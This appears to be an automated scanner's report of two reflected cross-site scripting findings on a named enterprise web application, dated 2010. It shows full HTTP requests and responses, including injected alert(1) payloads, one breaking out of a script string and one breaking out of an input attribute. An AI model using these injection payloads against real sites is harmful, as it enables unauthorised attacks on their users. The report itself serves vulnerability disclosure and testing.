1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | https://enterprisecenter |
Path: | /enterprisesolutions |
POST /enterprisesolutions Host: enterprisecenter.verizon Connection: keep-alive Referer: https://enterprisecenter Cache-Control: max-age=0 Origin: https://enterprisecenter Content-Type: application/x-www-form Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RegistrationApp=SessionId Content-Length: 481 serviceType=ANY&fVZTState ...[SNIP]... |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Date: Sat, 20 Nov 2010 02:16:05 GMT Connection: keep-alive Content-Length: 55599 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <li ...[SNIP]... ="hide"; document.getElementById( document.getElementById( } function ticketdata_func() { ticket_data = 'Service_id: '+'1EA0C';ALERT(1)/ aims_setExtraCustomerInfo } function MM_findObj(n, d) { //v4.01 var p,i,x; if(!d) d=document; if((p=n.index ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://enterprisecenter |
Path: | /enterprisesolutions |
POST /enterprisesolutions Host: enterprisecenter.verizon Connection: keep-alive Referer: https://enterprisecenter Cache-Control: max-age=0 Origin: https://enterprisecenter Content-Type: application/x-www-form Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RegistrationApp=SessionId Content-Length: 481 serviceType=ANY248ca"><img%20src%3da ...[SNIP]... |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Date: Sat, 20 Nov 2010 02:14:12 GMT Connection: keep-alive Content-Length: 37554 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <li ...[SNIP]... <input id = "savedServiceType" class="hide" value="ANY248ca"><img src=a onerror=alert(1) ...[SNIP]... |